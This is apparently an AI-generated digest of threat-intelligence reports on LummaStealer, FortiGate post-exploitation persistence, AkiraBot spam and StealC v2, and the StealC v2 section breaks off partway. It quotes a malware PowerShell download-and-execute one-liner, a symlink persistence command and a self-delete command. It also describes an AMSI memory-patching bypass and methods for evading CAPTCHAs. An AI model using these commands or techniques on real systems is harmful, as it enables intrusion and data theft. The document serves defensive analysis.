The Feed 2025-04-14

AI Generated Podcast

Summarized Stories

From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets: This article provides an in-depth look at the LummaStealer malware, covering its infection methods involving fake CAPTCHAs, payload deobfuscation, its darknet marketplace for selling stolen data, and indicators of compromise.
Multiple Fortigate vulnerabilities exploited and attackers remain persistent on the device after patching: Fortinet has disclosed a post-exploitation technique used by a threat actor to maintain read-only access to compromised FortiGate devices even after the initial vulnerabilities used for intrusion were patched. This technique involves the creation of a symbolic link within the SSL-VPN language files directory that points to the root filesystem.
AkiraBot AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale: This article details AkiraBot, a Python framework leveraging OpenAI to generate and send tailored spam messages through website forms and chats at a large scale, while employing sophisticated CAPTCHA bypass and network evasion techniques.
Autopsy of a Failed Stealer: StealC v2: This article presents a technical analysis of the StealC v2 stealer, outlining its features such as data exfiltration of browser information and files, its communication with command and control servers, and methods for identifying its infrastructure.
Campaign Targets Amazon EC2 Instance Metadata via SSRF: This article reports on a campaign in March 2025 that exploited Server-Side Request Forgery (SSRF) vulnerabilities on websites hosted in Amazon EC2 instances to gain unauthorized access to sensitive instance metadata.

From Shadow to Spotlight: The Evolution of LummaStealer and Its Hidden Secrets

Summary

This article provides an update on the LummaStealer malware, building upon previous research. It highlights the malware’s continued evolution and the agility of its developers in evading detection. The research by the Cybereason GSOC team details new tactics, techniques, and procedures (TTPs) employed by threat actors distributing LummaStealer, aiming to assist security analysts in identifying, classifying, containing, and eradicating related incidents. A key development is the observation of a new initial payload involving MSHTA process abuse for stealthy delivery. The article also delves into the deobfuscation of the malware, revealing a multi-stage payload execution involving JavaScript and PowerShell. Furthermore, it examines the darknet activities of LummaStealer operators, focusing on their internal marketplace on Telegram for monetizing stolen data. This marketplace features a rating system, advanced search capabilities, and flexible pricing, indicating a professionalization of their illicit operations. The article concludes with indicators of compromise (IOCs) and recommendations for mitigating the threat. The overall intelligence suggests a sophisticated and actively maintained MaaS offering with a focus on evasion and direct monetization of compromised data.

Technical Details

LummaStealer, attributed to Russian-speaking adversaries and operating as a Malware-as-a-Service (MaaS) since 2022, continues to evolve its techniques to bypass detection on Windows systems. The Cybereason EDR solution’s advanced detection capabilities were crucial in identifying and responding to these evolving tactics.

Initial Access: The article details a newly observed initial payload utilizing MSHTA Process Abuse. This technique leverages the legitimate Windows utility mshta.exe to execute remotely hosted code disguised as an MP4 file, along with a parameter mimicking a CAPTCHA. This method exploits a trusted system process to circumvent defense mechanisms, increasing the likelihood of successful execution. The delivery of this initial access often involves phishing emails containing malicious links that lead users to a fake CAPTCHA page. In some instances, users are socially engineered to copy a malicious script from the fake CAPTCHA and paste it into the Windows Run dialog box for execution.

Payload Delivery and Execution: The observed attack chain involves multiple stages of payload delivery and execution.

Stage 1 (MSHTA Execution): The mshta.exe process downloads a file masquerading as an MP4 multimedia file. The link directs the system to a specific directory seemingly containing an MP4 file. This file contains a combination of HEX and obfuscated JavaScript code. mshta.exe is capable of opening and executing these Microsoft HTML Applications (HTA), which run outside the browser’s security context, potentially bypassing application control and browser security settings. This technique aligns with MITRE ATT&CK T1218.005 (System Binary Proxy Execution: Mshta). Analysis of the obfuscated JavaScript reveals that it contains a variable (e.g., “Fygo”) holding the final version of the second-stage PowerShell payload. The eval() JavaScript function is used to execute this code, which can parse and execute arbitrary code passed to it with the sender’s privileges. The JavaScript also manipulates the HTML content of the document to extract and decode a hex-encoded payload. The decoded script further decodes a sequence of numbers and uses ActiveXObject to run another script, ultimately leading to the execution of the final PowerShell payload.
Stage 2 (Obfuscated PowerShell): The execution initiated by mshta.exe deploys a second-stage payload through a malicious link disguised as an MP4 file containing embedded instructions. This link executes a heavily obfuscated PowerShell script. The observed command line for this stage includes parameters such as -w 1 (WindowStyle Hidden), -ep Unrestricted (ExecutionPolicy Unrestricted), and -nop (NoProfile) to execute without a profile and potentially in a hidden window. The PowerShell script contains a long hexadecimal string and a parameter that indicates AES encryption is used. The decryption key is hardcoded within the script. The Initialization Vector (IV) is set to a 16-byte block of empty slots. Decryption of this layer reveals a redirection to a specific URL (e.g., https://sakura[.]holistic[-]haven[.]shop/singl6). Further analysis of the content hosted at this URL reveals nested mathematical operations, indicating a layered obfuscation mechanism.
Stage 3 (Payload): The deobfuscated PowerShell code contains a large array ($dsahg78das) of bytes and a function (fdsjnh). This function decodes and processes data through the following steps:
- Creates an ArrayList ($arrMath) and populates it with characters from the $dsahg78das array.
- Joins these characters into a single string $z.
- Decodes the string $z from Base64.
- Converts the decoded string to a byte array ($byteString).
- Performs an XOR operation on $byteString using a key derived from the $gdfsodsao variable. The $gdfsodsao variable, while obfuscated, is ultimately resolved to invoke the ScanContent method of System.Management.Automation.AmsiUtils with the arguments “Invoke-Mimikatz” and “32”, although this logic is treated as a string and not executed.
- Converts the XOR-decoded byte array back to a string ($xordData) and returns it.
- The script then dynamically calls a method $jMdONfJV from a type $yWxOpbM, passing the result of fdsjnh as a parameter, and subsequently invokes a method $YjMNzUFLdZVJ() on the decoded data. The final decoded output reveals code related to memory manipulation and a Base64-encoded .NET assembly.
Stage 4 (Memory Injection): The final PowerShell script scans the current PowerShell process’s memory to locate and replace specific patterns. It dynamically creates a .NET assembly to import necessary Windows API functions from kernel32.dll and psapi.dll, such as VirtualProtect, GetCurrentProcess, VirtualQuery, GetSystemInfo, GetMappedFileName, ReadProcessMemory, and WriteProcessMemory. The script searches for the signature “AmsiScanBuffer” within memory regions associated with clr.dll. If found, it modifies the memory protection of these regions to make them writable, overwrites the “AmsiScanBuffer” pattern with null bytes, and then restores the original memory protection. This effectively bypasses the Antimalware Scan Interface (AMSI). Finally, the script loads and executes a Base64-encoded .NET assembly embedded within it. Analysis of this assembly’s content (after Base64 decoding) reveals strings related to the executable name (e.g., singl6.exe), functions suggestive of password theft (e.g., get_Password, set_Password), functions indicating potential further communication (e.g., set_Proxy, get_ClientProxy), and functions related to encryption and enumeration (e.g., EncryptKey40Bit, EncryptKey256Bit, GetEnumerator). This suggests the final payload is an info-stealer capable of collecting sensitive data and potentially establishing further communication channels.

Darknet Activity and Monetization: LummaStealer operators maintain an internal marketplace on Telegram (@lu*****bot) for buying and selling stolen data logs. This marketplace operates with an automated bot and includes features such as a seller rating system based on “Likes”, advanced search options for passwords and cookies, and a flexible price range for logs (from $0.10 to $1,000). The marketplace supports cryptocurrency deposits (Bitcoin and Ethereum) and provides 24/7 support. Sellers receive 70% of each sale, with a 30% platform fee. The LummaStealer ecosystem is also supported by public documentation hosted on GitBook and an alternative Telegram platform, providing guides for configuration and usage, lowering the barrier to entry for less skilled cybercriminals. LummaStealer is offered as a MaaS with three subscription tiers: Experienced, Professional, and Corporate, each with increasing features and capabilities, such as varying levels of filtering, bulk download, advanced widgets, non-resident loaders, and dedicated build cleaning lines. The new MSHTA-based variant likely belongs to the Professional or Corporate tier due to its non-resident loader capability.

Countries

Chile (targeted in June 2024)

Industries

Manufacturing (targeted in October 2024 in conjunction with Amadey Bot)
Various sectors (general targeting observed)

Recommendations

ISOLATE THE INFECTED MACHINE: Immediately disconnect the compromised device from the network to prevent propagation and data exfiltration.
LOCK ACTIVE USER SESSIONS: Close all active sessions on the affected user to limit attacker access.
BLOCK ALL USER ACCOUNTS ON THE MACHINE: Disable all user accounts on the compromised endpoint to restrict unauthorized access, especially given observed credential dumping scripts.
REIMAGE THE INFECTED MACHINE: Restore the system by re-imaging the device to remove all malicious artifacts.
RESET USER CREDENTIALS: Reset all credentials related to the compromised machine, including accounts, browser-stored passwords, crypto wallets, and any sensitive information. Implement 2FA where possible.
BLOCK IOCs: Block observed domains and IP addresses at organizational firewalls, proxies, and email gateways.
EDUCATE USERS: Train users to identify and avoid suspicious CAPTCHA prompts on untrusted sites and to detect phishing emails, as human interaction is often the initial access vector.

Hunting methods

While the article doesn’t provide готовые hunting queries in specific languages, the detailed breakdown of the TTPs can inform the creation of hunting rules:

Monitor for mshta.exe spawning unusual child processes: The abuse of mshta.exe to download and execute files, especially those masquerading as multimedia files (e.g., .mp4) with suspicious command-line arguments mimicking CAPTCHAs, should be investigated. Look for mshta.exe spawning powershell.exe or other scripting engines.
- Logic: LummaStealer uses mshta.exe to initiate the attack chain. Detecting its execution with unusual parameters or subsequent process creation is a key indicator.
Inspect PowerShell command lines for obfuscation and specific parameters: Look for PowerShell processes with parameters like -w 1, -ep Unrestricted, and -nop followed by long, seemingly random strings or hexadecimal values. The presence of [Security.Cryptography.Aes]::Create() and TransformFinalBlock within PowerShell commands suggests potential AES decryption.
- Logic: The second stage of the attack heavily relies on obfuscated PowerShell. Identifying these patterns can reveal the malware’s activity.
Analyze JavaScript code executed outside of a browser context: Identify instances where JavaScript is executed by processes like mshta.exe. Examine the code for the use of eval() with large, encoded strings or hex values, as well as the manipulation of document.documentElement.outerHTML to extract content.
- Logic: The first stage involves obfuscated JavaScript executed by mshta.exe. Detecting these characteristics can uncover the initial payload.
Monitor network connections to known LummaStealer C2 domains and IPs: Implement monitoring for connections to the IOCs listed in the article.
- Logic: Communication with C2 infrastructure is crucial for the malware to function. Blocking and monitoring these connections can help detect and prevent further activity.
Look for memory modifications in clr.dll: While more advanced, monitoring for processes attempting to write to memory regions associated with clr.dll after potentially changing memory protection (using VirtualProtect) could indicate AMSI bypass attempts.
- Logic: The final PowerShell stage attempts to bypass AMSI by patching clr.dll in memory. Detecting these actions is a strong indicator of LummaStealer activity.
Examine Base64 encoded data within PowerShell scripts: Look for Base64 encoded strings within PowerShell scripts, especially those that are subsequently decoded and executed. The decoded content might reveal further malicious activities or payloads.
- Logic: The final stage involves a Base64-encoded .NET assembly. Identifying and decoding such strings can reveal the ultimate goal of the attack.

IOC

Hashes (Executable)

Ef85ba125184cbb92b3abf780fa9dbf0a1f1d4d0
b133d42502750817aa8e88119ff36158d2f8ecee
30b18eb4082b8842fea862c2860255edafc838ab
f2ec439b1f1b8d7dcc38d979bcf6ad64fe437122
0551cdbf681c7ce31754247291dc550df0807cee
decd01a95a05f557720e62ada86fa929f4687e88
279ec364b8bc3244335c47ed2586d387e448ac7b
79d7a6e7441d478fc81638e6ed458e898e0ebf2b
88958d7c9749b7d085ee28d9fa50151a505eba09
b9ff81cc8ad9e4d30df66fe520d1a0f5231902a6
a2840e3927351244f253d54389a66342a4f6be33
60e30eaeedc7abb079fd7e6d2d8f486de5a9af38
d896764e7ce9e8685ce4e11aa49d556f8a23a547
8b0f45b361b9b74a5e4383d692e281a59f44f508
8bb8f2324aa1aca4da6fbea5cdaad4f66263b545
ded3ed8724e5913d341b3eaca9bd9f47f0e4a4a2

Domains (C2)

klipderiq[.]shop
check[.]qlkwr[.]com
xian[.]klipderiq[.]shop
simplerwebs[.]world
affc[.]klipcewucyu[.]shop
klipdiheqoe[.]shop
extranet-captcha[.]com
kliphylj[.]shop
klipbyxycaa[.]shop
goatstuff[.]sbs
awagama2[.]org
t1.awagama2[.]org
awagama[.]org
savecoupons[.]store
klipbazyxui[.]shop
deduhko2.klipzyroloo[.]shop
solve.gevaq[.]com
topofsuper[.]store
onceletthemcheck[.]com
dma.sportstalk-musiclover[.]com
scrutinycheck[.]cash
atsuka.thrivezest[.]org
solve.fizq[.]net
sos-at-vie-1.exo[.]io
pawpaws.readit-carfanatics[.]com
anita2[.]snuggleam[.]org
hookylucnh[.]click
buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com
sakura[.]holistic-haven[.]shop
pub-e62cce9a08224552b513d24397cb4413[.]r2[.]dev
heavens[.]holistic-haven[.]shop

IP Addresses (C2)

172[.]67[.]144[.]135
104[.]21[.]224
172[.]67[.]144[.]135
104[.]21[.]64[.]1
77[.]105[.]164[.]117
176[.]113[.]115[.]170
172[.]67[.]144[.]15
104[.]21[.]16[.]142
104[.]21[.]16[.]1
104[.]21[.]35[.]211

Original link: https://www.cybereason.com/blog/threat-analysis-lummastealer-2.0

Multiple Fortigate vulnerabilities exploited and attackers remain persistent on the device after patching

Summary

Fortinet has disclosed a post-exploitation technique used by a threat actor to maintain read-only access to compromised FortiGate devices even after the initial vulnerabilities used for intrusion were patched. This technique involves the creation of a symbolic link within the SSL-VPN language files directory that points to the root filesystem. This allows the threat actor to retain access to sensitive files, including configurations, through the publicly accessible SSL-VPN web panel. The targeting of known, unpatched vulnerabilities for initial access is a common tactic. Fortinet identified this new technique during an investigation and has released mitigations, including AV/IPS signatures and updated FortiOS versions to detect and remove the malicious symbolic link. Customers who have never enabled SSL-VPN on their devices are not impacted. Fortinet proactively communicated with affected customers based on telemetry data. CERT-FR (French Computer Emergency Response Team) has reported a widespread campaign utilizing this technique since early 2023, affecting numerous devices in France. Both Fortinet and CERT-FR emphasize the importance of upgrading devices and recommend additional incident response steps for potentially compromised systems.

Technical Details

The attack unfolds in two main phases: initial access and post-exploitation persistence.

Initial Access: Threat actors exploit known vulnerabilities in FortiGate devices to gain an initial foothold. The specific vulnerabilities mentioned include:

FG-IR-22-398
FG-IR-23-097
FG-IR-24-015
CVE-2022-42475
CVE-2023-27997
CVE-2024-21762

These vulnerabilities are exploited to gain unauthorized access to the FortiGate device’s filesystem. The 2H 2023 Global Threat Landscape Report from FortiGuard Labs indicated that threat actors exploit known vulnerabilities on average 4.76 days after public disclosure.

Post-Exploitation Persistence: Once initial access is achieved on devices with SSL-VPN enabled, the threat actor employs a novel technique to maintain read-only access. This involves creating a symbolic link. The symbolic link is created within a folder used to serve language files for the SSL-VPN. This link connects the user filesystem to the root filesystem.

ln -s / /path/to/ssl-vpn/language/files/malicious_link

This modification occurs within the user filesystem, which allows it to evade detection mechanisms that primarily focus on changes in the root filesystem. Consequently, even after the FortiGate device is updated with FortiOS versions that patch the original vulnerabilities, this symbolic link may remain. This persistent symbolic link grants the threat actor read-only access to the entire file system of the device through the publicly accessible SSL-VPN web panel. This access allows them to potentially view sensitive information such as configurations, which could aid in further malicious activities.

Fortinet’s investigation revealed that this activity was not targeted at a specific region or industry. CERT-FR, however, has observed a “massive campaign” with “numerous compromised devices” in France since early 2023.

Fortinet’s mitigation efforts included the development of an AV/IPS signature capable of detecting and removing this symbolic link from impacted devices. Furthermore, changes were implemented in the latest FortiOS releases to automatically detect and remove the malicious symbolic link and to prevent the SSL-VPN from serving such links in the future.

Countries

France (observed by CERT-FR).

Industries

Not specified by Fortinet. CERT-FR reported “numerous compromised devices” in France, suggesting a broad range of potential targets.

Recommendations

Upgrade FortiOS: It is critical for all organizations to keep their FortiGate devices up to date. Fortinet recommends upgrading to one of the following versions, which will remove the malicious symbolic link and prevent its exploitation: FortiOS 7.6.2, 7.4.7, 7.2.11 & 7.0.17, 6.4.16. Users on unsupported versions should migrate to a corrective version.
Enable AV/IPS: Ensure that the AV/IPS engine is licensed and enabled, as an AV/IPS signature was created to detect and automatically remove the malicious symbolic link in FortiOS 7.4, 7.2, 7.0, and 6.4.
Review Configurations: Immediately review device configurations for any unexpected changes.
Reset Secrets: Reset all secrets (passwords, certificates, identity tokens, cryptographic keys, etc.) configured on the affected equipment. This includes authentication secrets that may have been exposed.
Isolate Compromised Devices: If a compromise is suspected, isolate the affected FortiGate device from the network to prevent potential lateral movement. Perform a data freeze (snapshot for virtual machines) for investigation purposes.
Investigate Lateral Movement: Look for traces of lateralization within the network, including:
- Connections or attempts to connect to the Internet from the compromised device.
- Investigate destination IP addresses to see if other machines have attempted connections.
- Analyze EDR logs or Windows logs for connections originating from the compromised FortiGate device.
Check Active Directory Accounts: Identify any Active Directory accounts configured on the suspected device, verify their activity, and reset their associated secrets.
Leverage FortiOS Best Practices: Follow Fortinet’s guidance for system hardening.
Utilize Automation Features: Take advantage of FortiOS features that automate the upgrade process, such as Uninterrupted Cluster Upgrade, Sub-second failover, Fail-over protection, Auto-restore configs / Configuration revisions, and Automatic / Scheduled patch upgrades.
Report Incidents: Report any incidents and anomalous activity related to Fortinet’s report to CISA’s 24/7 Operations Center.

Hunting methods

AV/IPS Signature Detection: Fortinet has deployed an AV/IPS signature to detect the malicious symbolic link. The logic is likely based on identifying the specific file path and the characteristics of a symbolic link pointing from the SSL-VPN language files directory to the root directory.
Manual Inspection of SSL-VPN Language Files: Security analysts can manually inspect the SSL-VPN language files directory for any unexpected symbolic links pointing outside of the expected file structure. The path to the language files is located within the user filesystem.
Network Connection Monitoring: Analyze network connection logs from the FortiGate device for any unusual or unexpected outbound connections, which could indicate attacker activity after gaining read-only access. The logic is to identify command and control or data exfiltration attempts.
Correlation with Internal Logs: Investigate other internal systems for connections originating from the compromised FortiGate device or connections to the same external IPs the FortiGate communicated with around the time of the suspected compromise. This helps identify potential lateral movement.
Active Directory Account Activity Review: Examine logs for any suspicious activity associated with Active Directory accounts that were configured on the FortiGate device. Look for unusual login attempts or resource access patterns.

IOC

Vulnerabilities (for initial access)

CVE-2022-42475
CVE-2023-27997
CVE-2024-21762
FG-IR-22-398
FG-IR-23-097
FG-IR-24-015

Original link:

AkiraBot AI-Powered Bot Bypasses CAPTCHAs, Spams Websites At Scale

Summary

AkiraBot is a sophisticated Python-based framework designed for large-scale spamming of website contact forms and chat widgets. The bot promotes a low-quality Search Engine Optimization (SEO) service branded as “Akira” or “ServiceWrap”. Since September 2024, SentinelLABS has observed AkiraBot targeting over 400,000 websites and successfully spamming at least 80,000. A key feature of AkiraBot is its use of OpenAI’s language models to generate custom outreach messages tailored to the content of targeted websites, likely improving the chances of bypassing spam filters. The framework is modular and employs various techniques to bypass CAPTCHA challenges and evade network detection, indicating a significant investment by its creator in overcoming standard website defenses. The bot has evolved over time, expanding its targets from simple contact forms to include chat widgets on platforms like Reamaze and broadening the types of websites it targets, initially focusing on Shopify but later including GoDaddy, Wix, and generic sites. The use of rotating attacker-controlled domains in the messages further complicates detection and filtering efforts.

Technical Details

AkiraBot is implemented as a Python framework with file timestamps indicating activity from September 2024 to the present. Early versions were referred to as “Shopbot,” reflecting an initial focus on Shopify websites, but the targeting scope expanded to include GoDaddy, Wix, and generic website contact forms. The framework utilizes hardcoded OpenAI API keys and the same proxy credentials across different versions, linking the various iterations despite differing directory names like “bubble_working_clone,” “fingerprints-server,” “GoDaddy,” “NextCaptcha,” and others. Analysis of logs suggests the operator likely uses Windows Server systems.

The bot’s core functionality involves targeting website contact forms using functions like _submit_old_website. Newer versions also target Live Chat widgets, such as those provided by Reamaze. AkiraBot leverages OpenAI’s gpt-4o-mini model with the role “You are a helpful assistant that generates marketing messages” to create personalized spam content. This process involves using templates with placeholders like <WEBSITE_NAME> and <KEYWORD>. The <KEYWORD> is derived from text scraped from the target website using the BeautifulSoup library, which converts HTML into a format readable by the LLM. The prompt sent to OpenAI instructs the model to incorporate the website name and a description of the site’s specialization into the marketing message. This dynamic message generation makes traditional signature-based spam filtering less effective. The bot also rotates attacker-controlled domains within these messages.

AkiraBot places a strong emphasis on CAPTCHA bypass to achieve its scale of operations. It targets common CAPTCHA services like hCAPTCHA and reCAPTCHA, including Cloudflare’s implementation. The bot employs a multi-layered approach to CAPTCHA evasion. Firstly, it uses Selenium WebDriver, an automation framework, to simulate user browsing activity and load target websites. Secondly, it injects a JavaScript script named inject.js into the website’s Document Object Model (DOM) via a headless Chrome instance. This script manipulates various browser attributes used for fingerprinting, such as Audio Context and Voice engines, graphics rendering (canvas and WebGL), installed fonts, Navigator objects (including browser type, OS, geolocation, hardware details, languages, and privacy settings), system memory, storage, CPU profile, and timezone. This aims to make the bot’s session appear as a legitimate user to the webserver. Thirdly, AkiraBot integrates with several CAPTCHA solving services, including Capsolver, FastCaptcha, and NextCaptcha, which act as failover mechanisms when browser emulation is insufficient. The TokenGenerator_fastcaptcha class in v10.py handles interactions with these services. Additionally, the bot runs a headless Chrome instance to periodically refresh tokens required for interacting with Reamaze chat widgets.

For network detection evasion, AkiraBot utilizes a proxy service called SmartProxy. The get_random_proxy function is used to select proxies from a list. While SmartProxy claims to use ethically sourced proxies, it has been noted for its use by cybercriminal actors, with its credentials appearing in the BlackBasta ransomware leaks. The bot rotates through these proxies to diversify its traffic sources and avoid IP-based blocking. Some versions of the bot also leverage the iproxyonline service (fxdx[.]in) for proxy rotation, managed by the monitor.py script.

AkiraBot logs its activity and success metrics to submissions.csv, which can contain the AI-generated spam messages. Failed attempts are recorded in failed.txt and failed_old.txt. Analysis of these logs from January 2025 indicated over 80,000 successfully spammed unique domains out of over 420,000 targeted domains in total. Some versions of AkiraBot utilize a Telegram bot for real-time logging of success metrics via the monitor.py and monitor_random.py scripts. These scripts use pyautogui to automate the process of pasting and executing a JavaScript file (script.js) into the browser’s developer console to handle CAPTCHA refreshes and defeats. The Telegram bot, associated with the username @htscasdasdadwoobot and the name “Shadow / hts,” receives notifications about proxy rotations and CAPTCHA submissions.

The infrastructure used by AkiraBot involves rotating spam domains, with older domains like akirateam[.]com (registered January 2022) and goservicewrap[.]com (registered April 2024) having been identified. Historical DNS records show connections between AkiraBot domains and potentially malicious infrastructure. For instance, mail.servicewrap-go[.]com briefly shared a CNAME record with 77980.bodis[.]com, a domain linked to malvertising campaigns and banking trojan communications. An unusual connection was also observed with unj[.]digital, a self-described digital marketing and software development firm, which contained anchor links pointing to 77980.bodis[.]com and had its subdomain smtp.unj[.]digital also point to the same malicious domain via a CNAME record.

The SEO services promoted by AkiraBot, under the brands “Akira” and “ServiceWrap,” exhibit suspicious review patterns on TrustPilot. They often receive numerous similar 5-star reviews, potentially generated artificially, alongside 1-star reviews from users claiming to have been spammed or alleging that the services are scams.

OpenAI has acknowledged SentinelLABS’ research and has disabled the API key involved, stating that distributing output from their services for spam violates their policies. They are continuing to investigate and will disable any other associated assets. SentinelLABS concludes that AkiraBot is a continuously evolving threat that poses a significant challenge to website defenses due to its sophisticated CAPTCHA bypass mechanisms and AI-powered message generation. Blocking the identified domains is currently the most straightforward method to mitigate this threat.

Countries

Not explicitly mentioned, but the targeted websites are likely global, with a focus on small to medium-sized businesses in various regions. The hosting locations of some infrastructure components include Germany and Cyprus.

Industries

The primary targeted industries are small to medium-sized businesses across various sectors that utilize website contact forms and chat widgets for customer interaction or business inquiries. Initially focused on eCommerce platforms like Shopify, the bot expanded to target websites built with GoDaddy, Wix, Squarespace, and other technologies commonly used by these businesses.

Recommendations

The easiest indicators to block are the rotating set of domains used to sell the Akira and ServiceWrap SEO offerings. Organizations should monitor network traffic and email logs for connections to these domains. Implementing robust spam filtering mechanisms that go beyond simple keyword blocking is also crucial due to the AI-generated and tailored nature of the spam content. Website owners should ensure their CAPTCHA implementations are up-to-date and consider using more advanced bot detection and mitigation techniques. Monitoring for unusual traffic patterns originating from proxy services, particularly SmartProxy, could also provide early detection of AkiraBot activity. Collaboration with CAPTCHA providers and reporting abuse are important steps in disrupting this type of automated spam campaign.

Hunting methods

While the report does not explicitly provide Yara, Sigma, KQL, or SPL queries, threat hunters can develop rules based on the observed TTPs:

Network Traffic Analysis:
- Monitor for outbound connections to the identified list of Akira and ServiceWrap domains.
- Look for connections to known proxy service IPs associated with SmartProxy.
- Investigate traffic patterns indicative of automated browsing, such as high request rates from single IPs (even if rotating).
- Examine user-agent strings for inconsistencies or patterns that might indicate headless browser usage, although AkiraBot attempts to mimic legitimate browsers.
Web Server Logs Analysis:
- Identify spikes in POST requests to contact form submission endpoints and chat widget APIs from unusual or proxy IP addresses.
- Look for submissions containing keywords or phrases related to SEO services and the “Akira” or “ServiceWrap” brands.
- Analyze the content of submissions for patterns indicative of AI-generated text, although this can be challenging due to the tailored nature of the messages.
Endpoint Detection and Response (EDR) Analysis:
- Monitor for the execution of Python scripts with filenames resembling those identified in the report (e.g., v14.py, monitor.py).
- Detect the use of Selenium WebDriver (webdriver), pyautogui, and the aiohttp library, which are employed by AkiraBot.
- Look for child processes of Python interpreters that involve launching headless Chrome instances.
- Monitor for the creation or modification of files named submissions.csv, failed.txt, failed_old.txt, proxy_submitting.txt, templates.txt, chat_template.txt, stats.json, and script.js.
Threat Intelligence Platform Integration:
- Integrate the provided list of domains and file hashes into threat intelligence platforms for automated alerting and correlation with other security events.

The logic behind these hunting methods is to identify network infrastructure, tool usage, and behavioral patterns associated with AkiraBot as described in the report. While direct hunting queries are not provided, understanding the bot’s TTPs allows security teams to build custom detection rules tailored to their environment.

IOC

Hashes

09ec44b6d3555a0397142b4308825483b479bf5a
0de065d58b367ffb28ce53bc1dc023f95a6d0b89
13de9fcd4e7c36d32594924975b7ef2b91614556
2322964ea57312747ae9d1e918811201a0c86e9c
253684ea43cb0456a6fec5728e1091ff8fcb27cf
36b4e424ce8082d7606bb9f677f97c0f594f254d
3a443c72995254400da30fe203f3fbf287629969
3a7cc815b921166006f31c1065dadfeb8d5190e6
4d24dd5c166fa471554ed781180e353e6b9642b7
51ec20e5356bbebd43c03faae56fca4c3bbe318e
55affc664472c4657c8534e0508636394eac8828
5620b527dfc71e2ee7efb2e22a0441b60fd67b84
5fde3180373c420cfa5cfdea7f227a1e1fe6936c
62e66bae4b892593009d5261d898356b6d0be3ef
6b65c296d9e1cda5af2f7dab94ce8e163b2a4ca8
6c56b986893dd1de83151510f4b6260613c5fbb9
6f342ff77cd43921210d144a403b8abb1e541a8b
7129194c63ae262c814da8045879aed7a037f196
71464c4f145c9a43ade999d385a9260aabcbf66d
730192b0f62e37d4d57bae9ff14ec8671fbf051e
769aa6ab69154ca87ccba0535e0180a985c21a0c
76aab3ab0f3f16cf30d7913ff767f67a116ff1e7
853fde052316be7887474996538b31f6ac0c3963
9d43494c6f87414c67533cce5ec86754311631fc
9f6ed2427e959e92eb1699024f457d87fa7b5279
aa72065673dc543e6bf627c7479bfe8a5e42a9c4
aac26242f4209bc59c82c8f223fcf2f152ce44bc
b643a1f2c4eb436db26763d5e2527f6bebe8bcbf
bbd754e36aee4702b9f20b90d509248945add4ea
cb194612ed003eaf8d8cf6ed3731f21f3edeb161
cc63ee921c29f47612096c34d6ee3ef244b33db2
e12c6911997d7c2af5550b7e989f1dc57b6733b8
eae675812c4274502051d6f2d36348f77a8464a0
f1c7c5d0870fd0abb7e419f2c2ba8df42fa74667
f2e71c9cbc4a18482a11ca3f54f2c958973360b4
fb7fdcc2fe11e95065a0ce9041348984427ca0f4

Domains

akirateam[.]com
beservicewrap[.]pro
firstpageprofs[.]com
getkira[.]info
go-servicewrap[.]com
gogoservicewrap[.]com
goservicewrap[.]com
joinnowkira[.]org
joinnowservicewraps[.]pro
joinservicewrap[.]com
joinuseakira[.]com
kiraone[.]info
letsgetcustomers[.]com
loveservice-wrap[.]com
mybkira[.]info
onlyforyoursite[.]com
searchengineboosters[.]com
service-wrap[.]com
servicewrap-go[.]com
servicewrap[.]pro
servicewrapgo[.]com
servicewrapone[.]com
theakirateam[.]com
toakira[.]pro
topservice-wrap[.]pro
topservicewrap[.]com
usekiara[.]com
useproakira[.]com
usethatakira[.]com
wantkiara[.]info
wearetherealpros[.]com
wejoinkir[.]vip
wethekira[.]shop
wetheservicewrap[.]pro
fxdx[.]in
77980.bodis[.]com
unj[.]digital
mail.servicewrap-go[.]com
smtp.unj[.]digital
useakira[.]com
usethatakira[.]com
servicewrapgo[.]com
goservicewrap[.]com

Original link: https://www.sentinelone.com/labs/akirabot-ai-powered-bot-bypasses-captchas-spams-websites-at-scale/

Autopsy of a Failed Stealer: StealC v2

Summary

StealC v2 is a notorious stealer malware written in C++ that has been active since 2022, with its second version released in March 2025. The developer briefly offered the source code of the first version for sale. StealC v2 introduces several enhancements over its predecessor, including allegedly server-side decryption of browser data (except Firefox), server-side brute-forcing of crypto plugins, and claimed RC4 encryption for all data transfer. Analysis of StealC v2 reveals various anti-analysis techniques, sophisticated methods for data exfiltration, and specific techniques for bypassing modern browser security measures to steal sensitive information like credentials, cookies, and cryptocurrency wallet data. Despite claims of RC4 encryption for C2 communication, the analysis indicates the use of simple Base64 encoding. Threat intelligence teams can utilize the provided C2 hunting queries, Yara rule, and indicators of compromise to detect and track this threat.

Technical Details

StealC v2 is a stealer malware written in C++. The developer announced its release in March 2025, highlighting a new codebase and improved functionalities. Interestingly, the developer also mentioned selling only five copies of the source code for the first version (v1.12.2).

Anti-Analysis Techniques: StealC v2 employs several techniques to evade detection and analysis. Similar to its previous version, it encrypts strings using RC4 with a hardcoded key. An IDAPython script is available to assist in reversing by decrypting these strings and extracting the C2 server address and Build ID. The stealer also performs a language check, likely as an anti-CIS (Commonwealth of Independent States) measure, although the sandbox username check present in the previous version has been removed. To control its execution environment, StealC v2 leverages Windows event objects. It enters a loop to check for an existing named event, indicating another instance. If found, it waits before re-checking. If no such event exists, it creates the named event. Failure to create the event leads to the stealer terminating. A “time bomb” mechanism is implemented, where the main functionality only executes if the date is not past November 4, 2025 (in the analyzed sample).

Build Configuration: Upon build generation, the user can configure several options, including self-deletion, taking screenshots, and blocking HWID or IP duplicates. The self-deletion mechanism involves obtaining the executable path and using ShellExecuteEx to execute the command cmd.exe /c timeout /t 5 & del /f /q, creating a delay before attempting to delete its own file.

Loader Functionality: StealC v2 features a configurable loader with three distinct payload execution paths.

Type 0 (EXE): Executes standard executables using ShellExecuteEx, attempting up to 10 retries on failure.
Type 1 (PowerShell): Executes payloads via the 32-bit version of PowerShell (C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe) using the command powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('[URL]')".
Type 2 (MSI): Silently installs MSI packages using msiexec.exe /passive, with up to 10 retries on failure. An option exists in the panel to use “RunAs” for elevated privileges during payload execution.

